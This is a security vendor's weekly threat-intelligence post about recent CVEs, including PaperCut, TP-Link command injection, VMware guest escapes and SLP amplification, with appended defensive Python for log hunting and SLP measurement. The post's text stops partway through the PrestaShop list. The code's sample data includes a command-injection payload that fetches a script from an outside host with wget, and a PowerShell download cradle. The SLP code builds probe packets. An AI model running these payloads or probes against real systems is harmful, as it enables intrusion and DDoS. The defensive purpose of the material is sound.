{"id":18003,"date":"2023-04-24T07:44:08","date_gmt":"2023-04-24T14:44:08","guid":{"rendered":"https:\/\/webdev.securin.xyz\/?p=18003"},"modified":"2023-05-02T15:26:12","modified_gmt":"2023-05-02T22:26:12","slug":"securins-threat-intelligence-apr-24-2023-apr-28-2023","status":"publish","type":"post","link":"https:\/\/10.42.32.162\/articles\/securins-threat-intelligence-apr-24-2023-apr-28-2023\/","title":{"rendered":"Securin’s Threat Intelligence: Apr 24, 2023 – Apr 28, 2023"},"content":{"rendered":"\t\t
<h2>Trending Threats<\/h2>
<p><strong>This edition brings you early warnings, trending news about cyber threats, and accurate threat context. Check out which threat group is on the rampage, what vulnerability it could soon weaponize, and more.<\/strong><\/p>
<h4>CISA Adds More Vulnerabilities to the KEV Catalog<\/h4>
<p>CISA added the following three vulnerabilities to the Known Exploited Vulnerabilities (KEV) catalog on April 21, 2023:<\/p>
<p>CVE-2023-28432 is a MinIO information disclosure vulnerability. In distributed (cluster) deployments, an unauthenticated request to the bootstrap verification endpoint returns the server’s environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD, which hands an attacker the credentials needed to take over the object store. The flaw is fixed in RELEASE.2023-03-20T20-16-18Z.<\/p>
<p>CVE-2023-27350 is a PaperCut MF\/NG improper access control vulnerability. It allows unauthenticated remote attackers to bypass authentication on the application server and run arbitrary code with SYSTEM privileges.<\/p>
<p><strong>Update<\/strong>: A proof-of-concept is publicly available, and two ransomware groups (Clop and LockBit) are actively exploiting the bug. Observed intrusions use the PaperCut server’s own process to launch PowerShell commands that download and install Atera and Syncro remote management and monitoring (RMM) software, giving the attackers persistent remote access.<\/p>
<p>CVE-2023-2136 is an integer overflow in Skia, Google Chrome’s graphics library. An attacker who has already compromised the renderer process can use a crafted HTML page to escape the Chrome sandbox; on its own it is not a full browser compromise, but chained with a renderer bug it is. Chrome 112.0.5615.137 fixes it.<\/p>
<p><strong>All federal civilian executive branch agencies are expected to patch these vulnerabilities by May 12, 2023.<\/strong><\/p>
<h2>Vulnerabilities to Watch Out For<\/h2>
<h4>CVE-2023-1389: TP-LINK WAN-Side Vulnerability<\/h4>
<p>CVE-2023-1389 affects the TP-Link Archer AX21 Wi-Fi router. It is an unauthenticated command injection vulnerability in the locale API exposed by the web management interface: the country parameter is handed to a shell without sanitization, so a single crafted HTTP request runs attacker-supplied commands as root on the router. The bug has recently been added to the arsenal of Mirai botnet operators, who are actively exploiting it in the wild. The injected command typically makes HTTP requests to the attackers’ command and control (C2) infrastructure to download and execute a series of Mirai binaries built for the router’s architecture, which enroll the device in the botnet.<\/p>
<p>Once the device is enrolled, the operators can use it to launch Distributed Denial-of-Service (DDoS) attacks, and this Mirai variant can shape its flood traffic to resemble legitimate requests, making it harder to separate attack traffic from genuine network traffic.<\/p>
<p><strong>TP-Link has released a patch for this CVE, and users are recommended to apply it immediately. If a device must stay online unpatched, make sure its web management interface is not reachable from the WAN side.<\/strong><\/p>
<h4>Multiple Vulnerabilities in UPS Software<\/h4>
<p>Three vulnerabilities affect APC Easy UPS Online Monitoring Software and Schneider Electric Easy UPS Online Monitoring Software. Installations on Windows 10, Windows 11, and Windows Server 2016, 2019, and 2022 are impacted.<\/p>
<p><strong>Users are recommended to upgrade to the fixed software versions to patch these vulnerabilities.<\/strong><\/p>
<h4>VMware’s Zero-Day Vulnerabilities<\/h4>
<p>CVE-2023-20869 is a stack-based buffer overflow in the Bluetooth device-sharing feature of VMware Workstation and Fusion. An attacker with local administrative privileges inside a virtual machine can exploit it to execute code as the virtual machine’s VMX process on the host, that is, to escape the guest.<\/p>
<p>CVE-2023-20870 is an information disclosure vulnerability in the same Bluetooth device-sharing feature. An attacker with local administrative privileges inside a VM can abuse it to read privileged information held in hypervisor memory, which is useful for defeating host-side mitigations before attempting a guest escape.<\/p>
<p>CVE-2023-20871 is a local privilege escalation flaw in VMware Fusion’s raw disk handling. An attacker who already has read\/write access to the host operating system can exploit it to escalate privileges and obtain root access on the host. It is rated high severity.<\/p>
<p>CVE-2023-20872 is an out-of-bounds read\/write vulnerability affecting both Workstation and Fusion. It lies in the SCSI CD\/DVD device emulation feature.<\/p>
<p>This flaw can be exploited by a local attacker with access to a VM that is configured to use a virtual SCSI controller and has a physical CD\/DVD drive attached. By exploiting it, the attacker can gain code execution on the hypervisor from inside the VM. VMware has published a temporary workaround: remove the CD\/DVD device from the VM, or configure the VM not to use a virtual SCSI controller.<\/p>
<p><strong>VMware has addressed all these vulnerabilities in a security advisory.<\/strong><\/p>
<h4>CVE-2023-29552: SLP’s DDoS Bug<\/h4>
<p>CVE-2023-29552 is a vulnerability in the Service Location Protocol (SLP), a legacy service-discovery protocol that listens on UDP and TCP port 427, affecting devices used by over 2,000 organizations. Roughly 54,000 exploitable SLP instances are exposed to the internet, and attackers can use them as reflectors for amplified DoS attacks. The amplification works in two steps. First, the attacker registers new services with the SLP server until its response buffer is full, so that an ordinary service request now elicits a very large UDP reply. Then the attacker sends small service requests with the victim’s spoofed source address, and the server’s oversized responses land on the victim. SLP authenticates neither registrations nor requests, which is why an unauthenticated remote attacker can do both.<\/p>
<p><strong>To safeguard your organization’s resources against potential misuse, disable SLP on systems that are reachable from the internet or untrusted networks, or block port 427 (UDP and TCP) at the perimeter. VMware has released a bulletin addressing this issue, noting that it only affects outdated ESXi versions that are no longer supported and recommending that administrators avoid exposing them to untrusted networks.<\/strong><\/p>
<h4>CVE-2023-20060: Cisco XSS Zero-Day Flaw<\/h4>
<p>CVE-2023-20060 is a vulnerability in the web-based management interface of Cisco Prime Collaboration Deployment (PCD) 14. Because user-supplied input is not sufficiently validated, an unauthenticated remote attacker can launch cross-site scripting attacks against users of the interface by persuading them to click a crafted link. Exploitation therefore requires user interaction.<\/p>
<p><strong>Cisco has published an advisory for this vulnerability; at the time of writing a software fix was planned but not yet available. Apply it as soon as it is released, and in the meantime warn users of the interface not to click suspicious links.<\/strong><\/p>
<h4>Vulnerabilities in PrestaShop<\/h4>
<p>PrestaShop addressed a few vulnerabilities that impact its software.<\/p>
<p>They are:<\/p>
<p>CVE-2023-30839 is a critical SQL injection vulnerability, fixed in PrestaShop 8.0.4 and 1.7.8.9. It allows an authenticated low-privileged user to perform unauthorized modifications to the online store’s database, which an attacker can escalate into significant damage or a service outage for the affected business, including injecting malicious code and backdoors and gaining access to the SQL database.<\/p>
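For the PaperCut item in the KEV section above, the detection a practitioner wants is not the initial authentication bypass (which looks like ordinary HTTP) but the post-exploitation step: the PaperCut application server process launching a shell that fetches an RMM installer. The following is an added example, not PaperCut’s, Securin’s or any vendor’s code; the event format is a constructed Sysmon-style dictionary, and the host names, paths and download URL in the sample telemetry are made up.

```python
"""Hunting for CVE-2023-27350 post-exploitation in process-creation telemetry.

Added example, not PaperCut's, Securin's or any vendor's code. The event shape is
a constructed Sysmon-style dict; only the process names and the Atera/Syncro
markers come from the public reporting summarised above.
"""
import re
from dataclasses import dataclass, field

PAPERCUT_SERVER = "pc-app.exe"            # PaperCut MF/NG application server process
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
RMM_MARKERS = re.compile(r"atera|syncro", re.I)
DOWNLOAD_CRADLE = re.compile(
    r"invoke-webrequest|\biwr\b|downloadfile|downloadstring|\bcurl\b|bitsadmin", re.I)


@dataclass
class Finding:
    record_id: int
    host: str
    severity: str
    reasons: list = field(default_factory=list)


def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def assess(event: dict):
    """Returns a Finding for a suspicious process-creation event, else None."""
    parent = _basename(event.get("ParentImage", ""))
    image = _basename(event.get("Image", ""))
    cmdline = event.get("CommandLine", "")
    reasons = []
    # The print server has no business spawning a shell: this alone is high-confidence.
    if parent == PAPERCUT_SERVER and image in SHELLS:
        reasons.append(f"{parent} spawned {image}")
    if parent == PAPERCUT_SERVER and DOWNLOAD_CRADLE.search(cmdline):
        reasons.append("download cradle launched by the PaperCut server")
    # RMM installers are legitimate tools; without the PaperCut parent this is only a lead.
    if RMM_MARKERS.search(cmdline):
        reasons.append("Atera/Syncro RMM reference in command line")
    if not reasons:
        return None
    severity = "high" if parent == PAPERCUT_SERVER else "medium"
    return Finding(event["RecordId"], event["Computer"], severity, reasons)


def hunt(events):
    return [f for f in map(assess, events) if f is not None]


# Constructed sample telemetry (hostnames, paths and URL are made up).
SAMPLE_EVENTS = [
    {"RecordId": 1, "Computer": "PRINT01",
     "ParentImage": r"C:\Program Files\PaperCut MF\server\bin\win\pc-app.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -ExecutionPolicy Bypass -NoProfile -c "
                    "\"Invoke-WebRequest http://example.invalid/setup.msi -OutFile "
                    "C:\\Windows\\Temp\\setup.msi; msiexec /i C:\\Windows\\Temp\\setup.msi "
                    "/qn INTEGRATORLOGIN=atera\""},
    {"RecordId": 2, "Computer": "PRINT01",
     "ParentImage": r"C:\Program Files\PaperCut MF\server\bin\win\pc-app.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c whoami"},
    {"RecordId": 3, "Computer": "WS42",
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Get-Process"},
    {"RecordId": 4, "Computer": "PRINT01",
     "ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Program Files\PaperCut MF\server\bin\win\pc-app.exe",
     "CommandLine": '"pc-app.exe" -service'},
    {"RecordId": 5, "Computer": "HELPDESK3",
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": "msiexec /i C:\\Users\\jo\\Downloads\\AteraAgent.msi /qn"},
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"[{f.severity}] {f.host} record {f.record_id}: " + "; ".join(f.reasons))
```

The severity split matters in triage: a help-desk machine installing an Atera agent (record 5) is a lead to confirm with the IT team, whereas pc-app.exe spawning cmd.exe (record 2) is worth paging on even without a download cradle, because the server should never do it.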
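For the TP-Link CVE-2023-1389 section above, here is what looking for exploitation attempts in the router’s HTTP request records comes down to, next to the allow-list check that would have prevented the injection in the first place. This is an added example, not TP-Link’s, Securin’s or any vendor’s code. The endpoint path and the form, operation and country parameter names are my reading of public analyses of the bug rather than something this page states, so treat them as assumptions; the LAN subnet and every request record below are constructed.

```python
"""Spotting CVE-2023-1389 exploitation attempts against a TP-Link Archer AX21 in
HTTP request records, plus the allow-list check the firmware should have applied.

Added example, not TP-Link's, Securin's or any vendor's code. Endpoint path and
parameter names are assumptions from public analyses; LAN subnet and requests
are constructed.
"""
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

LOCALE_ENDPOINT = re.compile(r"/cgi-bin/luci/;stok=[^/]*/locale$")   # assumed path
SHELL_META = re.compile(r"[;&|`$(){}<>\n]")
COUNTRY_CODE = re.compile(r"[A-Za-z]{2}")
LAN = ipaddress.ip_network("192.168.0.0/24")                          # assumed LAN


def valid_country(value: str) -> bool:
    """Hardened check: a country is exactly two letters; nothing else reaches a shell."""
    return COUNTRY_CODE.fullmatch(value) is not None


def _params(req: dict):
    parts = urlsplit(req["url"])
    params = parse_qs(parts.query, keep_blank_values=True)
    for key, values in parse_qs(req.get("body", ""), keep_blank_values=True).items():
        params.setdefault(key, []).extend(values)    # the same field may arrive in the body
    return parts.path, params


def classify(req: dict, lan=LAN) -> str:
    """'exploit_attempt', 'wan_exposure' (management API hit from outside the LAN) or 'ok'."""
    path, params = _params(req)
    if not LOCALE_ENDPOINT.search(path):
        return "ok"
    if params.get("form") == ["country"]:
        for value in params.get("country", []):
            if SHELL_META.search(value) or not valid_country(value):
                return "exploit_attempt"
    return "ok" if ipaddress.ip_address(req["src"]) in lan else "wan_exposure"


def scan(requests):
    return [(r["src"], classify(r)) for r in requests]


# Constructed request records; the metacharacter payloads are illustrative, not real captures.
SAMPLE_REQUESTS = [
    {"src": "203.0.113.7", "method": "GET",
     "url": "/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id)"},
    {"src": "192.168.0.10", "method": "POST",
     "url": "/cgi-bin/luci/;stok=/locale?form=country", "body": "operation=write&country=US"},
    {"src": "198.51.100.9", "method": "POST",
     "url": "/cgi-bin/luci/;stok=/locale?form=country",
     "body": "operation=write&country=%60wget%20http%3A%2F%2F198.51.100.9%2Fbin.sh%60"},
    {"src": "192.168.0.10", "method": "GET",
     "url": "/cgi-bin/luci/;stok=/locale?form=lang&operation=read"},
    {"src": "203.0.113.7", "method": "GET",
     "url": "/cgi-bin/luci/;stok=/locale?form=country&operation=read"},
]

if __name__ == "__main__":
    for src, verdict in scan(SAMPLE_REQUESTS):
        print(f"{src:>14}  {verdict}")
```

Two caveats. The "wan_exposure" verdict is the one to act on even when no payload is seen: a management endpoint answering requests from outside the LAN is the precondition for the whole attack. And on Python older than 3.9.2, parse_qs also splits on ";", which would chop a payload containing that character into separate fields; if you run this against real logs, check the interpreter version or pass the raw query through a metacharacter check as well.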
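The SLP section above describes the amplification in words; the numbers are easier to reason about with the actual wire format. The block below builds the SLPv2 service request that a reflector answers, parses the service reply, and computes the amplification ratio, with a one-shot probe you can point at hosts you are authorised to test. It is an added example, not Securin’s, VMware’s or any SLP implementation’s code. Message layouts follow RFC 2608; the service type, scope and the sample reply used to simulate a stuffed reflector are constructed.

```python
"""SLPv2 (RFC 2608) request builder and reply parser for measuring the
reflection/amplification ratio behind CVE-2023-29552 on hosts you own.
Added example; layouts follow RFC 2608, sample data is constructed.
"""
import random
import socket
import struct

SLP_PORT = 427
SLP_VERSION = 2
FN_SRVRQST, FN_SRVRPLY = 1, 2
HEADER_FIXED = 14      # bytes preceding the variable-length language tag


def _header(function_id: int, body_len: int, xid: int, lang: bytes) -> bytes:
    length = HEADER_FIXED + len(lang) + body_len
    return (struct.pack("!BB", SLP_VERSION, function_id)
            + length.to_bytes(3, "big")        # total message length (24-bit)
            + struct.pack("!H", 0)             # flags: overflow/fresh/mcast all clear
            + (0).to_bytes(3, "big")           # next extension offset
            + struct.pack("!HH", xid, len(lang)) + lang)


def build_srvrqst(service_type=b"service:service-agent", scope=b"DEFAULT",
                  xid=None, lang=b"en") -> bytes:
    """The small unicast SrvRqst that a reflector answers with a large SrvRply."""
    xid = random.randrange(1, 0xFFFF) if xid is None else xid
    fields = (b"", service_type, scope, b"", b"")   # PRList, type, scope list, predicate, SPI
    body = b"".join(struct.pack("!H", len(f)) + f for f in fields)
    return _header(FN_SRVRQST, len(body), xid, lang) + body


def build_srvrply(urls, xid: int, lang=b"en") -> bytes:
    """The SrvRply a server sends; used here to simulate a reflector whose
    registration table an attacker has filled with bogus services."""
    entries = b"".join(struct.pack("!BHH", 0, 0xFFFF, len(u)) + u + b"\x00" for u in urls)
    body = struct.pack("!HH", 0, len(urls)) + entries    # error code 0, URL entry count
    return _header(FN_SRVRPLY, len(body), xid, lang) + body


def parse_header(msg: bytes) -> dict:
    if len(msg) < HEADER_FIXED or msg[0] != SLP_VERSION:
        raise ValueError("not an SLPv2 message")
    lang_len = struct.unpack("!H", msg[12:14])[0]
    return {"function": msg[1],
            "length": int.from_bytes(msg[2:5], "big"),
            "overflow": bool(msg[5] & 0x80),   # set when the reply was truncated to fit UDP
            "xid": struct.unpack("!H", msg[10:12])[0],
            "lang": msg[14:14 + lang_len],
            "body_offset": HEADER_FIXED + lang_len}


def parse_srvrply(msg: bytes):
    """Returns (error_code, [url, ...]) from a SrvRply; auth blocks are skipped."""
    hdr = parse_header(msg)
    if hdr["function"] != FN_SRVRPLY:
        raise ValueError("not a SrvRply")
    pos = hdr["body_offset"]
    error_code, count = struct.unpack("!HH", msg[pos:pos + 4])
    pos += 4
    urls = []
    for _ in range(count):
        _reserved, _lifetime, url_len = struct.unpack("!BHH", msg[pos:pos + 5])
        pos += 5
        urls.append(msg[pos:pos + url_len])
        pos += url_len
        n_auth, pos = msg[pos], pos + 1
        for _ in range(n_auth):                 # each auth block carries its own length
            pos += struct.unpack("!H", msg[pos + 2:pos + 4])[0]
    return error_code, urls


def amplification_factor(request: bytes, reply: bytes) -> float:
    return round(len(reply) / len(request), 1)


def probe(host: str, timeout: float = 2.0):
    """Sends one SrvRqst to a host you are authorised to test and returns
    (request_bytes, reply_bytes, ratio). Not called by the offline demo below."""
    req = build_srvrqst()
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(req, (host, SLP_PORT))
        reply, _ = sock.recvfrom(65535)
    return len(req), len(reply), amplification_factor(req, reply)


# Constructed reflector state: 1,000 bogus registrations, as after an attacker's SrvReg flood.
SAMPLE_URLS = [f"service:example.test:8080/svc-{i:04d}".encode() for i in range(1000)]
SAMPLE_REQUEST = build_srvrqst(xid=0x1234)
SAMPLE_REPLY = build_srvrply(SAMPLE_URLS, xid=0x1234)

if __name__ == "__main__":
    print(len(SAMPLE_REQUEST), "byte request ->", len(SAMPLE_REPLY), "byte reply,",
          amplification_factor(SAMPLE_REQUEST, SAMPLE_REPLY), "x amplification")
```

A low ratio from a probe today does not mean a host is safe: the attacker’s first step is to grow the reply by registering services, so any internet-facing SLP responder is a reflector in waiting, and the remedy is to disable the service or filter port 427 rather than to trust the measured number. The overflow flag in the header is worth logging from probes, since it marks the point where the server has more to say than fits in one UDP datagram.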